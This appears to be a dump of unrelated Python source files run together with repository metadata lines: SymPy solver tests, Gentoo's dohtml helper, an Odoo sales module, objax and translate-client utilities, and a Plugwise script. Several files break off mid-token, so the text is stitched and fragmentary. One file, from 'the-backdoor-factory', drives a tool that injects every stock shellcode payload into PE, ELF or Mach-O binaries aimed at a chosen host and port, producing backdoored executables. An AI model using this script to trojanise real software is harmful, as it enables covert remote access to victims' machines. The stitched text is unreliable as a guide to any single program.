(-x**Rational(1,3))/2 + I*sqrt(3)*x**Rational(1,3)/2,
x**Rational(1,3),
(-x**Rational(1,3))/2 - I*sqrt(3)*x**Rational(1,3)/2,
])
a11,a12,a21,a22,b1,b2 = symbols('a11,a12,a21,a22,b1,b2')
assert solve([a11*x + a12*y - b1, a21*x + a22*y - b2], x, y) == \
{ y : (a11*b2 - a21*b1)/(a11*a22 - a12*a21),
x : (a22*b1 - a12*b2)/(a11*a22 - a12*a21) }
solution = {y: S.Zero, x: S.Zero}
assert solve((x-y, x+y), x, y ) == solution
assert solve((x-y, x+y), (x, y)) == solution
assert solve((x-y, x+y), [x, y]) == solution
assert solve( x**3 - 15*x - 4, x) == [-2 + 3**Rational(1,2),
4,
-2 - 3**Rational(1,2) ]
assert sorted(solve((x**2 - 1)**2 - a, x)) == \
sorted([(1 + a**S.Half)**S.Half, -(1 + a**S.Half)**S.Half,
(1 - a**S.Half)**S.Half, -(1 - a**S.Half)**S.Half])
def test_solve_polynomial2():
x = Symbol('x')
assert solve(4, x) == []
def test_solve_polynomial_cv_1a():
"""
Test for solving on equations that can be converted to a polynomial equation
using the change of variable y -> x**Rational(p, q)
"""
x = Symbol('x')
assert solve( x**Rational(1,2) - 1, x) == [1]
assert solve( x**Rational(1,2) - 2, x) == [4]
assert solve( x**Rational(1,4) - 2, x) == [16]
assert solve( x**Rational(1,3) - 3, x) == [27]
ans = solve(x**Rational(1,2)+x**Rational(1,3)+x**Rational(1,4),x)
assert set([NS(w, n=2) for w in ans]) == \
set(['0.010', '-9.5 + 2.8*I', '0', '-9.5 - 2.8*I'])
def test_solve_polynomial_cv_1b():
x, a = symbols('x a')
assert set(solve(4*x*(1 - a*x**(S(1)/2)), x)) == set([S(0), 1/a**2])
assert set(solve(x * (x**(S(1)/3) - 3), x)) == set([S(0), S(27)])
def test_solve_polynomial_cv_2():
"""
Test for solving on equations that can be converted to a polynomial equation
multiplying both sides of the equation by x**m
"""
x = Symbol('x')
assert solve(x + 1/x - 1, x) in \
[[ Rational(1,2) + I*sqrt(3)/2, Rational(1,2) - I*sqrt(3)/2],
[ Rational(1,2) - I*sqrt(3)/2, Rational(1,2) + I*sqrt(3)/2]]
def test_solve_rational():
"""Test solve for rational functions"""
x, y, a, b = symbols('x,y,a,b')
assert solve( ( x - y**3 )/( (y**2)*sqrt(1 - y**2) ), x) == [y**3]
def test_linear_system():
x, y, z, t, n = symbols('x,y,z,t,n')
assert solve([x-1, x-y, x-2*y, y-1], [x,y]) is None
assert solve([x-1, x-y, x-2*y, x-1], [x,y]) is None
assert solve([x-1, x-1, x-y, x-2*y], [x,y]) is None
assert solve([x+5*y-2, -3*x+6*y-15], x, y) == {x: -3, y: 1}
M = Matrix([[0,0,n*(n+1),(n+1)**2,0],
[n+1,n+1,-2*n-1,-(n+1),0],
[-1, 0, 1, 0, 0]])
assert solve_linear_system(M, x, y, z, t) == \
{y: 0, z: -t*(1 + n)/n, x: -t*(1 + n)/n}
def test_linear_systemLU():
x, y, z, n = symbols('x,y,z,n')
M = Matrix([[1,2,0,1],[1,3,2*n,1],[4,-1,n**2,1]])
assert solve_linear_system_LU(M, [x,y,z]) == {z: -3/(n**2+18*n),
x: 1-12*n/(n**2+18*n),
y: 6*n/(n**2+18*n)}
# Note: multiple solutions exist for some of these equations, so the tests
# should be expected to break if the implementation of the solver changes
# in such a way that a different branch is chosen
def test_tsolve():
a, b = symbols('a,b')
x, y, z = symbols('x,y,z')
assert solve(exp(x)-3, x) == [log(3)]
assert solve((a*x+b)*(exp(x)-3), x) == [-b/a, log(3)]
assert solve(cos(x)-y, x) == [acos(y)]
assert solve(2*cos(x)-y,x)== [acos(y/2)]
raises(NotImplementedError, "solve(Eq(cos(x), sin(x)), x)")
# XXX in the following test, log(2*y + 2*...) should -> log(2
|
shadghost/Auto-Backdoor
|
the-backdoor-factory/payloadtests.py
|
Python
|
gpl-3.0
| 6,022
| 0.001993
|
#!/usr/bin/env python
'''
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import pebin
import machobin
import elfbin
import sys
import os
def basicDiscovery(FILE):
macho_supported = ['\xcf\xfa\xed
|
\xfe', '\xca\xfe\xba\xbe',
'\xce\xfa\xed\xfe',
]
testBinary = open(FILE, 'rb')
header = testBinary.read(4)
testBinary.close()
if 'MZ' in header:
return 'PE'
elif 'E
|
LF' in header:
return 'ELF'
elif header in macho_supported:
return "MACHO"
else:
        print 'Only support ELF, PE, and MACH-O file formats'
return None
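# Magic-byte examples (illustrative): PE files start with 'MZ'; ELF files
# carry '\x7fELF' in their first four bytes; the Mach-O magics above cover
# 32-bit, 64-bit and fat binaries.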
if __name__ == "__main__":
'''
Will create patched binaries for each payload for the type of binary provided.
    Each payload has its own port number.
Usage: ./payloadtests.py file 127.0.0.1 8080
'''
if len(sys.argv) != 4:
print "Will create patched binaries for each stock shellcode/payload for the "
print "type of binary provided. Each payload type has it's own port number."
print "Usage:" + str(sys.argv[0]) + " binary HOST PORT"
sys.exit()
file = sys.argv[1]
host = sys.argv[2]
port = int(sys.argv[3])
outputfiles = {}
is_supported = basicDiscovery(file)
    if is_supported == "PE":
patchtypes = ['APPEND', 'JUMP', 'SINGLE']
supported_file = pebin.pebin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
#print supported_file.flItms['avail_shells']
for aShell in supported_file.flItms['avail_shells']:
for patchtype in patchtypes:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + patchtype + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
if patchtype == 'APPEND':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, ADD_SECTION=True)
elif patchtype == 'JUMP':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, CAVE_JUMPING=True)
elif patchtype == 'SINGLE':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, CAVE_JUMPING=False)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
elif is_supported is "ELF":
supported_file = elfbin.elfbin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
for aShell in supported_file.avail_shells:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
supported_file = elfbin.elfbin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
elif is_supported is "MACHO":
supported_file = machobin.machobin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
for aShell in supported_file.avail_shells:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
supported_file = machobin.machobin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, FAT_PRIORITY='ALL')
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
print "Successful files are in backdoored:"
for afile, aresult in outputfiles.iteritems():
if aresult is True:
print afile, 'Success'
else:
print afile, 'Fail'
os.remove('backdoored/' + afile)
|
prometheanfire/portage
|
bin/dohtml.py
|
Python
|
gpl-2.0
| 6,987
| 0.025619
|
#!/usr/bin/python
# Copyright 1999-2013 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
#
# Typical usage:
# dohtml -r docs/*
# - put all files and directories in docs into /usr/share/doc/${PF}/html
# dohtml foo.html
# - put foo.html into /usr/share/doc/${PF}/html
#
#
# Detailed usage:
# dohtml <list-of-files>
# - will install the files in the list of files (space-separated list) into
# /usr/share/doc/${PF}/html, provided the file ends in .css, .gif, .htm,
# .html, .jpeg, .jpg, .js or .png.
# dohtml -r <list-of-files-and-directories>
# - will do as 'dohtml', but recurse into all directories, as long as the
# directory name is not CVS
# dohtml -A jpe,java [-r] <list-of-files[-and-directories]>
# - will do as 'dohtml' but add .jpe,.java (default filter list is
# added to your list)
# dohtml -a png,gif,html,htm [-r] <list-of-files[-and-directories]>
# - will do as 'dohtml' but filter on .png,.gif,.html,.htm (default filter
# list is ignored)
# dohtml -x CVS,SCCS,RCS -r <list-of-files-and-directories>
# - will do as 'dohtml -r', but ignore directories named CVS, SCCS, RCS
#
from __future__ import print_function
import os
import shutil
import sys
from portage.util import normalize_path
# Change back to original cwd _after_ all imports (bug #469338).
os.chdir(os.environ["__PORTAGE_HELPER_CWD"])
def dodir(path):
try:
os.makedirs(path, 0o755)
except OSError:
if not os.path.isdir(path):
raise
os.chmod(path, 0o755)
def dofile(src,dst):
shutil.copy(src, dst)
os.chmod(dst, 0o644)
def eqawarn(lines):
cmd = "source '%s/isolated-functions.sh' ; " % \
os.environ["PORTAGE_BIN_PATH"]
for line in lines:
cmd += "eqawarn \"%s\" ; " % line
os.spawnlp(os.P_WAIT, "bash", "bash", "-c", cmd)
skipped_directories = []
skipped_files = []
warn_on_skipped_files = os.environ.get("PORTAGE_DOHTML_WARN_ON_SKIPPED_FILES") is not None
unwarned_skipped_extensions = os.environ.get("PORTAGE_DOHTML_UNWARNED_SKIPPED_EXTENSIONS", "").split()
unwarned_skipped_files = os.environ.get("PORTAGE_DOHTML_UNWARNED_SKIPPED_FILES", "").split()
def install(basename, dirname, options, prefix=""):
fullpath = basename
if prefix:
fullpath = os.path.join(prefix, fullpath)
if dirname:
fullpath = os.path.join(dirname, fullpath)
if options.DOCDESTTREE:
desttree = options.DOCDESTTREE
else:
desttree = "html"
destdir = os.path.join(options.ED, "usr", "share", "doc",
options.PF.lstrip(os.sep), desttree.lstrip(os.sep),
options.doc_prefix.lstrip(os.sep), prefix).rstrip(os.sep)
if not os.path.exists(fullpath):
sys.stderr.write("!!! dohtml: %s does not exist\n" % fullpath)
return False
elif os.path.isfile(fullpath):
ext = os.path.splitext(basename)[1][1:]
if ext in options.allowed_exts or basename in options.allowed_files:
dodir(destdir)
dofile(fullpath, os.path.join(destdir, basename))
elif warn_on_skipped_files and ext not in unwarned_skipped_extensions and basename not in unwarned_skipped_files:
skipped_files.append(fullpath)
elif options.recurse and os.path.isdir(fullpath) and \
basename not in options.disallowed_dirs:
for i in os.listdir(fullpath):
pfx = basename
if prefix:
pfx = os.path.join(prefix, pfx)
install(i, dirname, options, pfx)
elif not options.recurse and os.path.isdir(fullpath):
global skipped_directories
skipped_directories.append(fullpath)
return False
else:
return False
return True
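# Worked example (illustrative paths): with ED=/tmp/image, PF=foo-1.0, an empty
# doc_prefix and the default "html" desttree, install("a.html", "docs", options)
# copies docs/a.html to /tmp/image/usr/share/doc/foo-1.0/html/a.html.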
class OptionsClass:
def __init__(self):
self.PF = ""
self.ED = ""
self.DOCDESTTREE = ""
if "PF" in os.environ:
self.PF = os.environ["PF"]
if self.PF:
self.PF = normalize_path(self.PF)
if "force-prefix" not in os.environ.get("FEATURES", "").split() and \
os.environ.get("EAPI", "0") in ("0", "1", "2"):
self.ED = os.environ.get("D", "")
else:
self.ED = os.environ.get("ED", "")
if self.ED:
self.ED = normalize_path(self.ED)
if "_E_DOCDESTTREE_" in os.environ:
self.DOCDESTTREE = os.environ["_E_DOCDESTTREE_"]
if self.DOCDESTTREE:
self.DOCDESTTREE = normalize_path(self.DOCDESTTREE)
self.allowed_exts = ['css', 'gif', 'htm', 'html', 'jpeg', 'jpg', 'js', 'png']
if os.environ.get("EAPI", "0") in ("4-python", "5-progress"):
self.allowed_exts += ['ico', 'svg', 'xhtml', 'xml']
self.allowed_files = []
self.disallowed_dirs = ['CVS']
self.recurse = False
self.verbose = False
self.doc_prefix = ""
def print_help():
opts = OptionsClass()
print("dohtml [-a .foo,.bar] [-A .foo,.bar] [-f foo,bar] [-x foo,bar]")
print(" [-r] [-V] <file> [file ...]")
print()
print(" -a Set the list of allowed to those that are specified.")
print(" Default:", ",".join(opts.allowed_exts))
print(" -A Extend the list of allowed file types.")
print(" -f Set list of allowed extensionless file names.")
print(" -x Set directories to be excluded from recursion.")
print(" Default:", ",".join(opts.disallowed_dirs))
print(" -p Set a document prefix for installed files (empty by default).")
print(" -r Install files and directories recursively.")
print(" -V Be verbose.")
print()
def parse_args():
options = OptionsClass()
args = []
x = 1
while x < len(sys.argv):
arg = sys.argv[x]
if arg in ["-h","-r","-V"]:
if arg == "-h":
print_help()
sys.exit(0)
elif arg == "-r":
options.recurse = True
elif arg == "-V":
options.verbose = True
elif sys.argv[x] in ["-A","-a","-f","-x","-p"]:
x += 1
if x == len(sys.argv):
print_help()
sys.exit(0)
elif arg == "-p":
options.doc_prefix = sys.argv[x]
if options.doc_prefix:
options.doc_prefix = normalize_path(options.doc_prefix)
else:
values = sys.argv[x].split(",")
if arg == "-A":
options.allowed_exts.extend(values)
elif arg == "-a":
options.allowed_exts = values
elif arg == "-f":
options.allowed_files = values
elif arg == "-x":
options.disallowed_dirs = v
|
alues
|
else:
args.append(sys.argv[x])
x += 1
return (options, args)
def main():
(options, args) = parse_args()
if options.verbose:
print("Allowed extensions:", options.allowed_exts)
print("Document prefix : '" + options.doc_prefix + "'")
print("Allowed files :", options.allowed_files)
success = False
endswith_slash = (os.sep, os.sep + ".")
for x in args:
trailing_slash = x.endswith(endswith_slash)
x = normalize_path(x)
if trailing_slash:
# Modify behavior of basename and dirname
# as noted in bug #425214, causing foo/ to
# behave similarly to the way that foo/*
# behaves.
x += os.sep
basename = os.path.basename(x)
dirname = os.path.dirname(x)
success |= install(basename, dirname, options)
for x in skipped_directories:
eqawarn(["QA Notice: dohtml on directory '%s' without recursion option" % x])
for x in skipped_files:
eqawarn(["dohtml: skipped file '%s'" % x])
if success:
retcode = 0
else:
retcode = 1
sys.exit(retcode)
if __name__ == "__main__":
main()
|
Jgarcia-IAS/Fidelizacion_odoo
|
openerp/addons/sale_stock/sale_stock.py
|
Python
|
agpl-3.0
| 24,595
| 0.005733
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime, timedelta
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP, float_compare
from openerp.osv import fields, osv
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
import pytz
from openerp import SUPERUSER_ID
class sale_order(osv.osv):
_inherit = "sale.order"
def _get_default_warehouse(self, cr, uid, context=None):
company_id = self.pool.get('res.users')._get_company(cr, uid, context=context)
warehouse_ids = self.pool.get('stock.warehouse').search(cr, uid, [('company_id', '=', company_id)], context=context)
if not warehouse_ids:
return False
return warehouse_ids[0]
def _get_shipped(self, cr, uid, ids, name, args, context=None):
res = {}
for sale in self.browse(cr, uid, ids, context=context):
group = sale.procurement_group_id
if group:
res[sale.id] = all([proc.state in ['cancel', 'done'] for proc in group.procurement_ids])
else:
res[sale.id] = False
return res
def _get_orders(self, cr, uid, ids, context=None):
res = set()
for move in self.browse(cr, uid, ids, context=context):
if move.procurement_id and move.procurement_id.sale_line_id:
res.add(move.procurement_id.sale_line_id.order_id.id)
return list(res)
def _get_orders_procurements(self, cr, uid, ids, context=None):
res = set()
for proc in self.pool.get('procurement.order').browse(cr, uid, ids, context=context):
if proc.state =='done' and proc.sale_line_id:
res.add(proc.sale_line_id.order_id.id)
return list(res)
def _get_picking_ids(self, cr, uid, ids, name, args, context=None):
res = {}
for sale in self.browse(cr, uid, ids, context=context):
if not sale.procurement_group_id:
res[sale.id] = []
continue
res[sale.id] = self.pool.get('stock.picking').search(cr, uid, [('group_id', '=', sale.procurement_group_id.id)], context=context)
return res
def _prepare_order_line_procurement(self, cr, uid, order, line, group_id=False, context=None):
vals = super(sale_order, self)._prepare_order_line_procurement(cr, uid, order, line, group_id=group_id, context=context)
location_id = order.partner_shipping_id.property_stock_customer.id
vals['location_id'] = location_id
routes = line.route_id and [(4, line.route_id.id)] or []
vals['route_ids'] = routes
vals['warehouse_id'] = order.warehouse_id and order.warehouse_id.id or False
vals['partner_dest_id'] = order.partner_shipping_id.id
return vals
_columns = {
'incoterm': fields.many2one('stock.incoterms', 'Incoterm', help="International Commercial Terms are a series of predefined commercial terms used in international transactions."),
'picking_policy': fields.selection([('direct', 'Deliver each product when available'), ('one', 'Deliver all products at once')],
'Shipping Policy', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
help="""Pick 'Deliver each product when available' if you allow partial delivery."""),
'order_policy': fields.selection([
('manual', 'On Demand'),
('picking', 'On Delivery Order'),
('prepaid', 'Before Delivery'),
], 'Create Invoice', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
help="""On demand: A draft invoice can be created from the sales order when needed. \nOn delivery order: A draft invoice can be created from the delivery order when the products have been delivered. \nBefore delivery: A draft invoice is created from the sales order and must be paid before the products can be delivered."""),
'shipped': fields.function(_get_shipped, string='Delivered', type='boolean', store={
'procurement.order': (_get_orders_procurements, ['state'], 10)
}),
'warehouse_id': fields.many2one('stock.warehouse', 'Warehouse', required=True),
'picking_ids': fields.function(_get_picking_ids, method=True, type='one2many', relation='stock.picking', string='Picking associated to this sale'),
}
_defaults = {
'warehouse_id': _get_default_warehouse,
'picking_policy': 'direct',
'order_policy': 'manual',
}
def onchange_warehouse_id(self, cr, uid, ids, warehouse_id, context=None):
val = {}
if warehouse_id:
warehouse = self.pool.get('stock.warehouse').browse(cr, uid, warehouse_id, context=context)
if warehouse.company_id:
val['company_id'] = warehouse.company_id.id
return {'value': val}
def action_view_delivery(self, cr, uid, ids, context=None):
'''
This function returns an action that display existing delivery orders
of given sales order ids. It can e
|
ither be in a list or in a form
view, if there is only one delivery order to show.
'''
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
result = mod_obj.get_object_reference(cr, uid, 'stock', 'action_p
|
icking_tree_all')
id = result and result[1] or False
result = act_obj.read(cr, uid, [id], context=context)[0]
#compute the number of delivery orders to display
pick_ids = []
for so in self.browse(cr, uid, ids, context=context):
pick_ids += [picking.id for picking in so.picking_ids]
#choose the view_mode accordingly
if len(pick_ids) > 1:
result['domain'] = "[('id','in',[" + ','.join(map(str, pick_ids)) + "])]"
else:
res = mod_obj.get_object_reference(cr, uid, 'stock', 'view_picking_form')
result['views'] = [(res and res[1] or False, 'form')]
result['res_id'] = pick_ids and pick_ids[0] or False
return result
def action_invoice_create(self, cr, uid, ids, grouped=False, states=['confirmed', 'done', 'exception'], date_invoice = False, context=None):
move_obj = self.pool.get("stock.move")
res = super(sale_order,self).action_invoice_create(cr, uid, ids, grouped=grouped, states=states, date_invoice = date_invoice, context=context)
for order in self.browse(cr, uid, ids, context=context):
if order.order_policy == 'picking':
for picking in order.picking_ids:
move_obj.write(cr, uid, [x.id for x in picking.move_lines], {'invoice_state': 'invoiced'}, context=context)
return res
def action_wait(self, cr, uid, ids, context=None):
res = super(sale_order, self).action_wait(cr, uid, ids, context=context)
for o in self.browse(cr, uid, ids):
noprod = self.test_no_product(cr, uid, o, context)
if noprod and o.order_policy=='picking':
self.writ
|
gmimano/commcaretest
|
corehq/apps/hqadmin/tasks.py
|
Python
|
bsd-3-clause
| 98
| 0.020408
|
from celery.task import task
import time
@task
def sleep(duration=10):
ti
|
me.sleep(duration)
|
|
google/objax
|
objax/util/check.py
|
Python
|
apache-2.0
| 2,313
| 0.003891
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of
|
the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writi
|
ng, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = ['assert_assigned_type_and_shape_match']
import jax
from objax.typing import JaxArray
TRACER_TYPES = (jax.interpreters.partial_eval.JaxprTracer,
jax.interpreters.partial_eval.DynamicJaxprTracer)
def split_shape_and_device(array):
if isinstance(array, jax.interpreters.pxla.ShardedDeviceArray):
return array.shape[0], array.shape[1:]
else:
return None, array.shape
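# e.g. a ShardedDeviceArray of shape (8, 32, 32) on 8 devices -> (8, (32, 32)),
# while an ordinary array of shape (32, 32) -> (None, (32, 32)) (illustrative).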
def assert_assigned_type_and_shape_match(existing_tensor, new_tensor):
assert isinstance(new_tensor, JaxArray.__args__), \
        f'Assignments to variable must be an instance of JaxArray, but received {type(new_tensor)}.'
new_tensor_device, new_tensor_shape = split_shape_and_device(new_tensor)
self_device, self_shape = split_shape_and_device(existing_tensor)
device_mismatch_error = f'Can not replicate a variable that is currently on ' \
f'{self_device} devices to {new_tensor_device} devices.'
assert (new_tensor_device is None) or (self_device is None) or (self_device == new_tensor_device), \
device_mismatch_error
shorter_length = min(len(new_tensor.shape), len(existing_tensor.shape))
is_special_ok = (isinstance(new_tensor, TRACER_TYPES) or isinstance(existing_tensor, TRACER_TYPES))
is_special_ok = is_special_ok and existing_tensor.shape[-shorter_length:] == new_tensor.shape[-shorter_length:]
shape_mismatch_error = f'Assign can not change shape of variable. The current variable shape is {self_shape},' \
f' but the requested new shape is {new_tensor_shape}.'
assert is_special_ok or new_tensor_shape == self_shape or new_tensor.shape == existing_tensor.shape, \
shape_mismatch_error
|
erik/translate
|
translate/client/exceptions.py
|
Python
|
gpl-3.0
| 5,955
| 0
|
# -*- coding: utf-8 -*-
# This file is part of translate.
#
# translate is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# translate is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# translate. If not, see <http://www.gnu.org/licenses/>.
"""
translate.client.exceptions
~~~~~~~~~~~~~~~~~~~~~~~~~~~
These are exception classes that are used by translate.client.Client. Most of
these classes are simple wrappers, just to differentiate different types of
errors. They can be constructed from a requests response object, or JSON
returned from an API call.
"""
import json
import logging
log = logging.getLogger(__name__)
class TranslateException(Exception):
"""Mostly empty base class for exceptions relating to translate.
This class is used as a catch-all for exceptions thrown by the server. If
possible, a more specific subclass of this exception will be used.
"""
@classmethod
def from_json(cls, obj, status_code=400):
"""Return the proper exception class from the JSON object returned from
the server.
"""
exceptions = {
429: RateLimitException,
431: SizeLimitException,
452: TranslationException,
453: TranslatorException,
454: BadLanguagePairException
}
try:
code = obj['code'] if ('code' in obj) else status_code
klass = exceptions[code]
return klass.from_json(obj)
except KeyError:
return cls("Unknown error occured: " + repr(obj))
@classmethod
def from_response(cls, resp):
"""Generate a proper exception from the given requests response object
and return it.
"""
try:
obj = json.loads(resp.text)
return TranslateException.from_json(obj, resp.status_code)
except ValueError:
log.error("Was given invalid JSON, bailing...")
return TranslateException.from_json({}, resp.status_code)
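# Dispatch sketch (hypothetical payload): TranslateException.from_json(
#     {'code': 429, 'details': {'limit': 10, 'per': 60, 'reset': 0}})
# returns RateLimitException(limit=10, per=60, reset=0).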
class HTTPException(TranslateException):
"""Raised when an error occurs with the HTTP connection to the server
(e.g. host is
|
not available, doesn't respond, etc.)
"""
pass
class RateLimitException(TranslateException):
"""Exception raised when a client goes over the rate
|
limit."""
def __init__(self, limit, per, reset):
self.limit = limit
self.per = per
self.reset = reset
@classmethod
def from_json(cls, obj):
try:
details = obj.get('details', {})
return cls(limit=details['limit'], per=details['per'],
reset=details['reset'])
except KeyError:
log.error("Received invalid JSON: " + repr(obj))
return cls(limit=0, per=0, reset=0)
def __str__(self):
return "Rate limit exceeded: {0} reqs / {1}s. Try again at {2}".format(
self.limit, self.per, self.reset)
class SizeLimitException(TranslateException):
"""Exception raised when a client tries to translate a text that is over
the server's size limit.
"""
def __init__(self, len, limit):
self.len = len
self.limit = limit
@classmethod
def from_json(cls, obj):
try:
details = obj['details']
return cls(len=details['len'], limit=details['limit'])
except KeyError:
log.error("Received invalid JSON: %s", repr(obj))
return cls(len=0, limit=0)
def __str__(self):
return "Specified text was too large: %d bytes. Maximum is %d bytes"\
.format(self.len, self.limit)
class TranslationException(TranslateException):
"""Returned on bad parameters to /translate"""
@classmethod
def from_json(cls, obj):
try:
msg = obj['message']
return cls("Bad parameters to translate API method: " + msg)
except KeyError:
log.error("Received invalid JSON: " + repr(obj))
return cls("Bad parameters to translate API method.")
class TranslatorException(TranslateException):
"""Returned when bad parameters are passed to the /translate method. (This
probably indicates some kind of API / Client bug.)
"""
def __init__(self, lang_pair, tried):
self.lang_pair = lang_pair
self.tried = tried
@classmethod
def from_json(cls, obj):
try:
details = obj['details']
pair = (details['from'], details['to'])
return cls(lang_pair=pair, tried=details['tried'])
except KeyError:
log.error("Received invalid JSON: " + repr(obj))
return cls(lang_pair=('unknown', 'unknown'), tried=['unknown'])
def __str__(self):
return "Failed to translate {0} (tried: {1})".format(self.lang_pair,
self.tried)
class BadLanguagePairException(TranslateException):
"""Raised when the client tried to translate using a language pair not
supported by the server
"""
def __init__(self, lang_pair):
self.lang_pair = lang_pair
@classmethod
def from_json(cls, obj):
try:
details = obj['details']
return cls(lang_pair=(details['from'], details['to']))
except KeyError:
log.error("Received invalid JSON: " + repr(obj))
return cls(lang_pair=('unknown', 'unknown'))
def __str__(self):
return "Unsupported language pair: {0}".format(self.lang_pair)
|
SevenW/Plugwise-2-py
|
devtools/Join-2.py
|
Python
|
gpl-3.0
| 58,244
| 0.009546
|
#!/usr/bin/env python3
# Copyright (C) 2012,2013,2014,2015,2016,2017,2018,2019,2020 Seven Watt <info@sevenwatt.com>
# <http://www.sevenwatt.com>
#
# This file is part of Plugwise-2-py.
#
# Plugwise-2-py is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Plugwise-2-py is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Plugwise-2-py. If not, see <http://www.gnu.org/licenses/>.
#
# The program is a major modification and extension to:
# python-plugwise - written in 2011 by Sven Petai <hadara@bsd.ee>
# which itself is inspired by Plugwise-on-Linux (POL):
# POL v0.2 - written in 2009 by Maarten Damen <http://www.maartendamen.com>
from serial.serialutil import SerialException
from plugwise import *
from swutil.util import *
from swutil.pwmqtt import *
from plugwise.api import *
from datetime import datetime, timedelta
import time
import calendar
import subprocess
import glob
import os
import logging
import queue
import threading
import itertools
mqtt = True
try:
import paho.mqtt.client as mosquitto
except:
mqtt = False
print(mqtt)
import pprint as pp
import json
#from json import encoder
#encoder.FLOAT_REPR = lambda o: format(o, '.2f')
json.encoder.FLOAT_REPR = lambda f: ("%.2f" % f)
def jsondefault(object):
return object.decode('utf-8')
#DEBUG_PROTOCOL = False
log_comm(True)
#LOG_LEVEL = 2
schedules_path = "config/schedules"
cfg = json.load(open("config/pw-hostconfig.json"))
tmppath = cfg['tmp_path']+'/'
perpath = cfg['permanent_path']+'/'
logpath = cfg['log_path']+'/'
port = cfg['serial']
epochf = False
if 'log_format' in cfg and cfg['log_format'] == 'epoch':
epochf = True
actdir = 'pwact/'
actpre = 'pwact-'
actpost = '.log'
curpre = 'pwpower'
curpost = '.log'
logdir = 'pwlog/'
logpre = 'pw-'
logpost = '.log'
open_logcomm(logpath+"pw-communication.log")
#prepare for cleanup of /tmp after n days.
cleanage = 604800  # seven days in seconds
locnow = datetime.utcnow()-timedelta(seconds=time.timezone)
now = locnow
yrfolder = str(now.year)+'/'
if not os.path.exists(perpath+yrfolder+actdir):
